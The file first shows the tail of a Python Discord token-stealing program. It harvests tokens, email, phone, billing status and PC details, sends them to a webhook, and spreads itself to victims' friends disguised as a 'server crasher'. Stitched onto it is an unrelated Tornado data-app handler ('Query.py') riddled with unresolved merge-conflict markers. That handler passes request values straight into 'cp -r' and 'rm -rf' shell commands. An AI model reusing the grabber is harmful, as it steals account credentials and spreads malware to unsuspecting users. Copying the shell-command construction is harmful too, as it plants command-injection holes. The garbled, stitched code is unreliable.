urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("_DISCORDWEBHOOK_", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8", errors = 'ignore' ) as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
Query.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Ivar Vargas Belizario
# Copyright (c) 2020
# E-mail: ivar@usp.br
import tornado.ioloop
import tornado.web
import tornado.httpserver
<<<<<<< HEAD
=======
import threading
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
import ujson
import glob
import os
import pandas as pd
import numpy as np
import os.path
import math
import bcrypt
import uuid
import zipfile
<<<<<<< HEAD
=======
import io
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
from io import BytesIO
from datetime import datetime
from bson.objectid import ObjectId
from vx.pgff.Settings import *
from vx.pgff.BaseHandler import *
from vx.pgff.MakeProjection import *
from vx.pgff.graphtree.gff import *
from vx.pgff.User import *
from vx.com.py.matrix.MData import *
from vx.com.py.database.MongoDB import *
class Query(BaseHandler):
#Get RequestHandler
def get(self):
<<<<<<< HEAD
dat = self.get_argument('data')
dat = ujson.loads(dat)
app = DataTransfer()
app.load(dat)
obj = ""
if app.argms["type"]==0:
#obj = app.action()
if app.argms["algorithm"]=="mst" or app.argms["algorithm"]=="nj":
g = Graph()
g.make_graph(Settings.DATA_PATH, app.argms)
# print("app.argms", app.argms)
# save
app.argms["nodes"] = g.data["graph"]["nodes"];
app.argms["ranking"] = g.data["ranking"];
app.argms["rankingmin"] = g.data["rankingmin"];
app.argms["rankingmax"] = g.data["rankingmax"];
# print("g.data[ranking]", g.data["ranking"], len(g.data["ranking"]))
# print("g.data[root]", g.data["root"], len(g.data["root"]))
Query.savegraph(app,g.data);
resultr = Query.openfeature(app);
obj = ujson.dumps(resultr);
elif app.argms["type"]==4:
dap = MakeProjection()
dap.execute(app.argms);
Query.saveprojection(app,dap.data);
resultr = Query.openinstance(app);
obj = ujson.dumps(resultr);
=======
obj = ""
app = DataTransfer(self.get_argument('data'))
if app.argms["type"]==0:
if app.argms["algorithm"]=="mst" or app.argms["algorithm"]=="nj":
# 0:ok; 1:working; 2:error
# lock dataset
Query.setStatus(app, 1);
t = threading.Thread(target=Query.processFeatures, args=(app,))
t.start()
obj = ujson.dumps(Query.getStatus(app));
elif app.argms["type"]==4:
# 0:ok; 1:working; 2:error
# lock dataset
Query.setStatus(app, 1);
t = threading.Thread(target=Query.processInstances, args=(app,))
t.start()
obj = ujson.dumps(Query.getStatus(app));
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
elif app.argms["type"]==1:
obj = ujson.dumps(Query.listdatasets(self.current_user));
elif app.argms["type"]==2:
<<<<<<< HEAD
obj = ujson.dumps(Query.loadatributenames(app.argms));
elif app.argms["type"]==3:
obj = ujson.dumps(Query.getdatasetname(app.argms));
=======
obj = ujson.dumps(Query.loadatributenames(app));
elif app.argms["type"]==3:
obj = ujson.dumps(Query.getdatasetname(app));
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# elif app.argms["type"]==4:
# obj = ujson.dumps(Query.savechangedashboard(app));
elif app.argms["type"]==5:
obj = ujson.dumps(Query.opencsv(app));
elif app.argms["type"]==6:
obj = ujson.dumps(Query.updatedatasetname(app));
elif app.argms["type"]==7:
obj = ujson.dumps(Query.clonedataset(app, self.current_user));
elif app.argms["type"]==8:
obj = ujson.dumps(Query.sharedataset(app));
elif app.argms["type"]==9:
obj = ujson.dumps(Query.unsharedataset(app));
elif app.argms["type"]==10:
<<<<<<< HEAD
obj = ujson.dumps(Query.dropdataset(app));
=======
obj = ujson.dumps(Query.dropdataset(app.argms["file"]));
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
elif app.argms["type"]==11:
obj = ujson.dumps(User.changePassword(app, self.current_user));
elif app.argms["type"]==12:
obj = Query.downloaddataset(app, self.current_user, self);
elif app.argms["type"]==13:
obj = ujson.dumps(Query.silhouette(app));
<<<<<<< HEAD
elif app.argms["type"]==14:
obj = Query.openfeature(app)
#print("holaXXXXX",self.current_user, obj);
obj = ujson.dumps(obj);
elif app.argms["type"]==15:
obj = Query.openinstance(app)
#print("holaXXXXX",self.current_user, obj);
obj = ujson.dumps(obj);
elif app.argms["type"]==16:
obj = Query.export2dproj(app, self);
=======
#elif app.argms["type"]==14:
# obj = Query.openfeature(app)
# obj = ujson.dumps(obj);
#
#elif app.argms["type"]==15:
# obj = Query.openinstance(app)
# obj = ujson.dumps(obj);
#elif app.argms["type"]==16:
# obj = Query.export2dproj(app, self);
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
elif app.argms["type"]==17:
obj = Query.exportfeat2datafile(app, self);
elif app.argms["type"]==18:
obj = User.getUsers();
obj = ujson.dumps(obj);
elif app.argms["type"]==19:
obj = User.newUser(app.argms["data"]);
obj = ujson.dumps(obj);
elif app.argms["type"]==20:
obj = User.setAdmin(app.argms["data"]);
obj = ujson.dumps(obj);
<<<<<<< HEAD
=======
elif app.argms["type"]==21:
obj = ujson.dumps(Query.makeInstancesLabels(app));
elif app.argms["type"]==22:
obj = ujson.dumps(Query.getUnselecteFeatures(app));
elif app.argms["type"]==23:
obj = ujson.dumps(Query.setListFeaturesChecks(app));
elif app.argms["type"]==24:
obj = ujson.dumps(Query.opendataset(app));
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# self.write(ujson.dumps(obj))
self.write(obj)
self.finish()
#self.write(obj)
#Post RequestHandler
def post(self):
rs = ""
#print("data psotssssssssssssssss", self.get_argument('data'))
if self.current_user:
<<<<<<< HEAD
dat = self.get_argument('data')
dat = ujson.loads(dat)
app = DataTransfer()
app.load(dat)
=======
app = DataTransfer(self.get_argument('data'))
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
#print("datdatdat",app.argms)
if app.argms["type"]==3:
app.argms["file"] = self.request.files['fileu'][0]
# obj.file = filed['body'].decode('utf-8')
rs = Query.uploadfiledata(app.argms, self.current_user);
self.write(rs)
<<<<<<< HEAD
=======
@staticmethod
def converid(file):
idin = file
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
return idin
@staticmethod
def processFeatures(app):
try:
ufe = Query.getUnselecteFeatures(app)
g = Graph()
g.make_graph(Settings.DATA_PATH, ufe, app.argms)
app.argms["nodes"] = g.data["graph"]["nodes"];
app.argms["ranking"] = g.data["ranking"];
app.argms["rankingmin"] = g.data["rankingmin"];
app.argms["rankingmax"] = g.data["rankingmax"];
Query.savegraph(app,g.data);
#resultr = Query.openfeature(app);
#obj = ujson.dumps(resultr);
except:
# error dataset
Query.setStatus(app, 2);
finally:
# unlock dataset
Query.setStatus(app, 0);
@staticmethod
def processInstances(app):
try:
dap = MakeProjection()
dap.execute(app.argms);
Query.saveprojection(app,dap.data);
except:
# error dataset
Query.setStatus(app, 2);
finally:
# unlock dataset
Query.setStatus(app, 0);
@staticmethod
def makedir(ndir):
if not os.path.exists(ndir):
os.makedirs(ndir)
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# static query methods
@staticmethod
def listfiles(outdir, ext):
dires = []
fileso = []
for name in os.listdir(outdir):
dires.append(os.path.join(outdir, name))
if name.endswith(ext):
# fileso.append(str(os.path.join(outdir, str(name))))
fileso.append({"name":str(name)})
return fileso
@staticmethod
def listdirs(folder):
if os.path.exists(folder):
# listd = [d for d in os.listdir(folder) if os.path.isdir(os.path.join(folder, d))]
# for d in listd:
# if os.path.isdir(os.path.join(folder, d)):
# print("ddd",d)
return [d for d in os.listdir(folder) if os.path.isdir(os.path.join(folder, d))]
else:
return []
@staticmethod
def listdatasets(iduser):
rs = []
if Settings.MULIUSER == 0:
dir_list = Query.listdirs(Settings.DATA_PATH)
# print("dir_list", dir_list)
for di in dir_list:
# print(Settings.DATA_PATH, di)
ro = DBX.find(DBS.DBGFF, "data",{"_id": di})
for row in ro:
rs.append( {"_id":row["_id"],
"_id_user": "localuser",
"owner":"localuser",
"name":row["name"],
"dateupdate":row["dateupdate"],
"isshare":row["isshare"],
} )
elif Settings.MULIUSER == 1:
<<<<<<< HEAD
iduser = iduser.decode("utf-8")
dbs = list(MongoDB.find(DBS.DBGFF, "data",
{"$or": [
{"_id_user": ObjectId(iduser)},
{"isshare": 1}
]
}
))
for row in dbs:
row_id = str(row["_id"])
row_id_user = str(row["_id_user"])
row_owner = ""
userdata = list(MongoDB.find(DBS.DBGFF, "user", {"_id": ObjectId(row_id_user)}))
for ud in userdata:
row_owner = ud["name"]
if iduser!=str(ud["_id"]):
row_id_user = ""
row["_id"] = row_id
row["_id_user"] = row_id_user
row["owner"] = row_owner
for row in dbs:
rs.append( {"_id":row["_id"],
"_id_user": row["_id_user"],
"owner":row["owner"],
=======
iduser = iduser.decode("utf-8")
dbs = list(MongoDB.aggregate(DBS.DBGFF, "data",
[
{"$lookup":
{
"from": "user",
"localField": "_id_user",
"foreignField" : "_id",
"as": "usersUnits",
}
},
{"$match": {
"$or": [
{"_id_user": ObjectId(iduser)},
{"isshare": 1}
]
}
},
{"$project":
{
"_id" : 1,
"_id_user": 1 ,
"name": 1,
"dateupdate" : 1,
"isshare" : 1,
"usersUnits._id" : 1 ,
"usersUnits.name" : 1 ,
}
},
{
"$sort": {
"dateupdate": -1
}
}
]
))
#print("dbs",dbs)
#iduser = iduser.decode("utf-8")
#dbs = list(MongoDB.find(DBS.DBGFF, "data",
# {"$or": [
# {"_id_user": ObjectId(iduser)},
# {"isshare": 1}
# ]
# }
# ))
#for row in dbs:
# row_id = str(row["_id"])
# row_id_user = str(row["_id_user"])
# row_owner = ""
#userdata = list(MongoDB.find(DBS.DBGFF, "user", {"_id": ObjectId(row_id_user)}))
#for ud in userdata:
# row_owner = ud["name"]
# if iduser!=str(ud["_id"]):
# row_id_user = ""
#row["_id"] = row_id
#row["_id_user"] = row_id_user
#row["owner"] = row_owner
for row in dbs:
#print(row)
rs.append( {"_id":str(row["_id"]),
"_id_user_query": str(iduser),
"_id_user": str(row["_id_user"]),
"owner":row["usersUnits"][0]["name"],
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
"name":row["name"],
"dateupdate":row["dateupdate"],
"isshare":row["isshare"],
} )
return rs
@staticmethod
<<<<<<< HEAD
def loadatributenames(argms):
f = open(Settings.DATA_PATH+argms["file"]+"/transform.csv", "r")
columns = f.readline().split(",")
columns = [x.strip() for x in columns]
f.close()
columns_aux = []
for col in columns:
if col != "INDEXIDUID_":
columns_aux.append(col)
columns = columns_aux
#print("loadatributenames",columns)
=======
def loadatributenames(app):
idin = Query.converid(app.argms["file"])
columns = []
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
if "fenames" in d and len(d["fenames"])>0:
columns = d["fenames"]
else:
f = open(Settings.DATA_PATH+app.argms["file"]+"/transform.csv", "r")
columns = f.readline().split(",")
columns = [x.strip() for x in columns]
f.close()
columns_aux = []
for col in columns:
#if col != "INDEXIDUID_":
columns_aux.append(col)
columns = columns_aux
DBX.update( DBS.DBGFF, "data",
{"_id": idin},
{"fenames":columns})
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
return columns
@staticmethod
def uploadfiledata(argms, iduser):
<<<<<<< HEAD
r = "<script>alert('Not Supported File Format');</script>"
=======
r = """<script>
parent.mwalert('','Error: upload file');
parent.opendatsetparser();
</script>"""
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# if Settings.MULIUSER == 0:
if Settings.MULIUSER == 1:
iduser = ObjectId(iduser.decode("utf-8"))
<<<<<<< HEAD
#print("iduser",iduser.decode("utf-8"));
path = Settings.DATA_PATH
o_fname, ext = os.path.splitext(argms["file"]['filename'])
dt_string = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
#print(ext, ext)
if ext == ".csv" or ext == ".data":
rowdata = {
=======
#print("iduser",iduser.decode("utf-8"));
path = Settings.DATA_PATH
o_fname, ext = os.path.splitext(argms["file"]['filename'])
ext = ext.lower()
dt_string = Query.now()
if ext == ".csv" or ext == ".zip":
rowdata = {
"fenames": [],
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
"name": o_fname,
"type": ext,
"configfeature": {},
"typefeature": "",
"layoutfeature": "",
"versionfeature": Settings.VERSION,
<<<<<<< HEAD
=======
"featurecheck": [],
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
"configinstance": {},
"typeinstance": "",
"layoutinstance": "",
"versioninstance": Settings.VERSION,
"datecreate": dt_string,
"dateupdate": dt_string,
"hasupdate": 0,
"isshare": 0,
<<<<<<< HEAD
"_id_user":iduser
};
idin = DBX.insert(DBS.DBGFF, "data", rowdata)
idin = str(idin)
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
r = "<script>parent.opendatsetparser('"+idin+"');</script>"
if ext == ".csv":
# save file
n_fname = idin;
n_fname_dir = path+n_fname;
filename_o = n_fname_dir+"/original.csv";
filename_t = n_fname_dir+"/transform.csv";
#create directory
if not os.path.exists(n_fname_dir):
os.makedirs(n_fname_dir)
#create original csv file
output_file = open(filename_o, 'wb')
output_file.write(argms["file"]['body'])
output_file.close()
argms["file"] = "";
#save transform csv file
df = pd.read_csv(filename_o, delimiter=",")
cat_columns = df.select_dtypes(['object']).columns
df[cat_columns] = df[cat_columns].astype('category')
for col in cat_columns:
df[col] = df[col].cat.codes
df.to_csv(filename_t, index=False)
elif ext == ".data":
=======
"statusopt": 0,
"statusval": "",
"_id_user":iduser,
};
idin = None
try:
#if True:
idin = DBX.insert(DBS.DBGFF, "data", rowdata)
idin = str(idin)
idin = Query.converid(idin)
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
if ext == ".csv":
# save file
Query.savefile(path, str(idin), argms["file"]['body'])
elif ext == ".zip":
z = zipfile.ZipFile(io.BytesIO(argms["file"]['body']))
data = z.read(z.infolist()[0])
Query.savefile(path, str(idin), data)
r = "<script>parent.opendatsetparser();</script>"
except:
# if idin!=None:
Query.dropdataset(str(idin))
"""
elif ext == ".data":
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# save file
n_fname = idin;
n_fname_dir = path+n_fname;
filename_o = n_fname_dir+"/original.data";
filename_t = n_fname_dir+"/transform.csv";
#create directory
if not os.path.exists(n_fname_dir):
os.makedirs(n_fname_dir)
#create original csv file
output_file = open(filename_o, 'wb')
output_file.write(argms["file"]['body'])
output_file.close()
argms["file"] = "";
#read data original.csv and save
MData.converdata2csv(filename_o, filename_t)
<<<<<<< HEAD
return r
@staticmethod
def getdatasetname(argms):
idin = argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
"""
return r
@staticmethod
def savefile(path, n_fname, data):
#n_fname = idin;
n_fname_dir = path+n_fname;
filename_o = n_fname_dir+"/original.csv";
filename_t = n_fname_dir+"/transform.csv";
#create directory
Query.makedir(n_fname_dir)
#create original csv file
output_file = open(filename_o, 'wb')
output_file.write(data)
output_file.close()
#argms["file"] = "";
#save transform csv file
df = pd.read_csv(filename_o, delimiter=",")
cat_columns = df.select_dtypes(['object']).columns
df[cat_columns] = df[cat_columns].astype('category')
for col in cat_columns:
df[col] = df[col].cat.codes
df.to_csv(filename_t, index=False)
@staticmethod
def getdatasetname(app):
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
re = ""
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
re = d["name"];
return re
<<<<<<< HEAD
# @staticmethod
# def savechangedashboard(app):
# idin = app.argms["file"]
# dt_string = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# MongoDB.update( DBS.DBGFF, "data",
# {"_id": ObjectId(idin)},
# { "config":app.argms,
# "layoutfeature":app.layoutfeature,
# "layoutinstance":app.layoutinstance,
# "dateupdate":dt_string,
# }
# )
# #print("rerererererererererere",str(re))
# return {"response":1};
=======
@staticmethod
def setListFeaturesChecks(app):
idin = Query.converid(app.argms["file"])
feidlist = app.argms["data"]
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
featurecheck = []
if "featurecheck" in d and len(d["featurecheck"])>0:
featurecheck = d["featurecheck"]
else:
cols = Query.loadatributenames(app)
if len(cols)>0:
featurecheck = [1 for i in range(len(cols))]
for i, v in feidlist:
featurecheck[i] = v
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"featurecheck":featurecheck})
rs = {"statusopt":0, "statusval":"", "response":{}}
return rs
@staticmethod
def getUnselecteFeatures(app):
result = []
idin = Query.converid(app.argms["file"])
da = list(DBX.find(DBS.DBGFF, "data", {"_id": idin}))
for d in da:
if "featurecheck" in d and len(d["featurecheck"])>0:
featurecheck = d["featurecheck"]
for i in range(len(featurecheck)):
if featurecheck[i] == 0:
result.append(i);
else:
cols = Query.loadatributenames(app)
if len(cols)>0:
featurecheck = [1 for i in range(len(cols))]
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"featurecheck":featurecheck})
#print("result", result)
return result;
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
@staticmethod
def opencsv(app):
filefe = Settings.DATA_PATH+app.argms["file"]+"/transform.csv"
df = pd.read_csv(filefe)
#print (df)
return {"response":1};
@staticmethod
def updatedatasetname(app):
<<<<<<< HEAD
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
nname = app.argms["newname"]
DBX.update( DBS.DBGFF,"data",
{"_id": idin},
{"name":nname})
return {"response":1};
@staticmethod
def clonedataset(app, iduser):
<<<<<<< HEAD
idin = app.argms["file"]
if Settings.MULIUSER == 0:
dat = list(DBX.find( DBS.DBGFF,"data", {"_id": idin}))
datc = {}
for row in dat:
for k, v in row.items():
if k != "_id":
datc[k] = v
dt_string = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
datc["name"] += " (clone)";
datc["datecreate"] = dt_string;
datc["dateupdate"] = dt_string;
datc["_id_user"] = iduser;
datc["_id"] = DBFile.uid();
ndir = Settings.DATA_PATH+datc["_id"]
if not os.path.exists(ndir):
os.makedirs(ndir)
DBFile.writeFile(ndir+"/data.obj", datc)
for name in os.listdir(Settings.DATA_PATH+idin):
if not name.endswith("data.obj"):
os.popen("cp -r "+Settings.DATA_PATH+idin+"/"+name+" "+ndir)
elif Settings.MULIUSER == 1:
idin = ObjectId(idin)
dat = list(MongoDB.find( DBS.DBGFF,"data", {"_id": ObjectId(idin)}))
datc = {}
for row in dat:
for k, v in row.items():
if k != "_id":
datc[k] = v
dt_string = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
datc["name"] += " (clone)";
datc["datecreate"] = dt_string;
datc["dateupdate"] = dt_string;
datc["_id_user"] = ObjectId(iduser.decode("utf-8"));
idinsert = MongoDB.insert( DBS.DBGFF,"data", datc)
idinsert = str(idinsert)
ndir = Settings.DATA_PATH+idinsert
if not os.path.exists(ndir):
os.makedirs(ndir)
os.popen("cp -r "+Settings.DATA_PATH+idin+"/* "+ndir)
=======
idin = Query.converid(app.argms["file"])
iduser = Query.converid(iduser.decode("utf-8"))
#print("iduser", iduser)
dat = list(DBX.find(DBS.DBGFF,"data", {"_id": idin}))
datc = {}
for row in dat:
for k, v in row.items():
if k != "_id":
datc[k] = v
dt_string = Query.now();
datc["name"] += " (clone)";
datc["datecreate"] = dt_string;
datc["dateupdate"] = dt_string;
datc["_id_user"] = iduser;
#datc["_id"] = DBFile.uid();
idinsert = DBX.insert(DBS.DBGFF, "data", datc)
idinsert = str(idinsert)
ndir = Settings.DATA_PATH+idinsert
Query.makedir(ndir)
os.popen("cp -r "+Settings.DATA_PATH+str(idin)+"/* "+ndir)
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
return {"response":1};
@staticmethod
def downloaddataset(app, iduser, selft):
<<<<<<< HEAD
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
zipname="download.zip"
zipb = ""
dat = list(DBX.find( DBS.DBGFF,"data", {"_id": idin}))
for row in dat:
zipname=row["name"]+".zip";
f = BytesIO();
<<<<<<< HEAD
dirpath = Settings.DATA_PATH+idin
=======
dirpath = Settings.DATA_PATH+str(idin)
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
fzip = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
basedir = os.path.dirname(dirpath) + '/'
for root, dirs, files in os.walk(dirpath):
if os.path.basename(root)[0] == '.':
continue
# dirname = root.replace(basedir, '')
dirname = root.replace(basedir, '')
<<<<<<< HEAD
dirname = dirname.replace(idin, '')
=======
dirname = dirname.replace(str(idin), '')
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
# print(dirname, basedir)
# dirname = root
for fi in files:
if fi[-1] == '~' or (fi[0] == '.' and fi != '.htaccess'):
continue
fzip.write(root + '/' + fi, dirname + '/' + fi)
selft.set_header('Content-Type', 'application/zip')
selft.set_header("Content-Disposition", "attachment; filename=%s" % zipname)
fzip.close()
zipb = f.getvalue()
f.close()
return zipb;
@staticmethod
<<<<<<< HEAD
=======
def setStatus(app, k):
if "file" in app.argms and app.argms["file"]!="" and "statusval" in app.argms and app.argms["statusval"]!="":
idin = Query.converid(app.argms["file"])
statusval = app.argms["statusval"]
DBX.update(DBS.DBGFF, "data",
{"_id": idin},
{"statusopt": k, "statusval": statusval})
@staticmethod
def getStatus(app):
idin = Query.converid(app.argms["file"])
status = {"statusopt":0, "statusval":app.argms["statusval"], "response":{}}
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
for r in re:
if "statusopt" in r and "statusopt" in r:
status["statusopt"] = r["statusopt"]
status["statusval"] = r["statusval"]
else:
DBX.update(DBS.DBGFF, "data",
{"_id": idin}, {"statusopt":0, "statusval":""})
return status
@staticmethod
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
def sharedataset(app):
idin = app.argms["file"]
MongoDB.update( DBS.DBGFF, "data",
{"_id": ObjectId(idin)},
{"isshare":1 }
)
return {"response":1};
@staticmethod
def unsharedataset(app):
idin = app.argms["file"]
MongoDB.update( DBS.DBGFF, "data",
{"_id": ObjectId(idin)},
{"isshare":0 }
)
return {"response":1};
@staticmethod
<<<<<<< HEAD
def dropdataset(app):
idin = app.argms["file"]
filefe = Settings.DATA_PATH+idin
=======
def dropdataset(idin):
filefe = Settings.DATA_PATH+str(idin)
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
os.system("rm -rf "+filefe)
if Settings.MULIUSER == 1:
MongoDB.delete(DBS.DBGFF, "data", {"_id": ObjectId(idin)})
<<<<<<< HEAD
r = "<script>parent.graphvis.loadlayoutdbs();</script>"
=======
r = "<script>parent.opendatsetparser();</script>"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
return {"response":r};
@staticmethod
def savegraph(app,p):
<<<<<<< HEAD
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
for r in re:
# config = app.argms
# if "config" in r and "projection" in r["config"]:
# config["projection"] = r["config"]["projection"]
# MongoDB.update(DBS.DBGFF, "data",
# {"_id":ObjectId(idin)}, {"config":config})
<<<<<<< HEAD
dataup = {"versionfeature":Settings.VERSION, "typefeature":"graph", "configfeature":app.argms, "layoutfeature":"feature.obj"}
=======
dataup = {
"versionfeature":Settings.VERSION,
"typefeature":"graph",
"configfeature":app.argms,
"layoutfeature":"feature.obj",
"dateupdate": Query.now(),
}
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
# dataup = {}
# if "configinstance" in r:
# dataup = r["configinstance"];
# dataup["ranking"] = app.argms["ranking"]
# else:
# dataup = app.argms
# dataupx = {"configinstance":dataup}
# MongoDB.update(DBS.DBGFF, "data",
# {"_id":ObjectId(idin)}, dataupx)
<<<<<<< HEAD
filename = Settings.DATA_PATH+app.argms["file"]+"/feature.obj"
=======
filename = Settings.DATA_PATH+str(idin)+"/feature.obj"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
with open(filename,'w') as fp:
ujson.dump(p, fp)
@staticmethod
def saveprojection(app,p):
<<<<<<< HEAD
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
for r in re:
if "configfeature" in r:
config = r["configfeature"]
config["projection"] = app.argms["projection"]
config["instanceproximity"] = app.argms["instanceproximity"]
config["target"] = app.argms["target"]
config["intarget"] = app.argms["intarget"]
config["featureselected"] = app.argms["featureselected"]
<<<<<<< HEAD
#config["ranking"] = app.argms["ranking"]
dataup = {"configfeature":config};
=======
config["idinstanceslabels"] = app.argms["idinstanceslabels"];
#config["ranking"] = app.argms["ranking"]
dataup = {"configfeature":config};
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
#print("r[configfeature]", r["configfeature"])
app.argms["ranking"] = r["configfeature"]["ranking"];
app.argms["nodes"] = r["configfeature"]["nodes"];
<<<<<<< HEAD
dataup = {"versioninstance":Settings.VERSION, "typeinstance":"projection","configinstance":app.argms, "layoutinstance":"instance.obj"}
=======
dataup = {
"versioninstance":Settings.VERSION,
"typeinstance":"projection",
"configinstance":app.argms,
"layoutinstance":"instance.obj",
"dateupdate": Query.now(),
}
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
DBX.update(DBS.DBGFF, "data",
{"_id":idin}, dataup)
# typefeature":"graph", "configfeature
<<<<<<< HEAD
filename = Settings.DATA_PATH+app.argms["file"]+"/instance.obj"
=======
filename = Settings.DATA_PATH+str(idin)+"/instance.obj"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
with open(filename,'w') as fp:
ujson.dump(p, fp)
@staticmethod
def silhouette(app):
<<<<<<< HEAD
idin = app.argms["file"]
if Settings.MULIUSER == 1:
idin = ObjectId(idin)
=======
idin = Query.converid(app.argms["file"])
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
re = list(DBX.find(DBS.DBGFF, "data", {"_id":idin}))
si = 0.0
for r in re:
if "typeinstance" in r and r["typeinstance"]=="projection":
<<<<<<< HEAD
filen = Settings.DATA_PATH+app.argms["file"]+"/instance.obj"
=======
filen = Settings.DATA_PATH+str(idin)+"/instance.obj"
>>>>>>> d52e075ee9202ad56995099b7c9fedb6ea96a974
if os.path.exists(filen):
data = {}
try:
infil = open(filen, "r")
data = ujson.load(infil)
infil.close()
except:
print("Something went wrong")
data = {}
# finally:
# data = {}
if "points" in data:
config = {}
if "configinstance" in r:
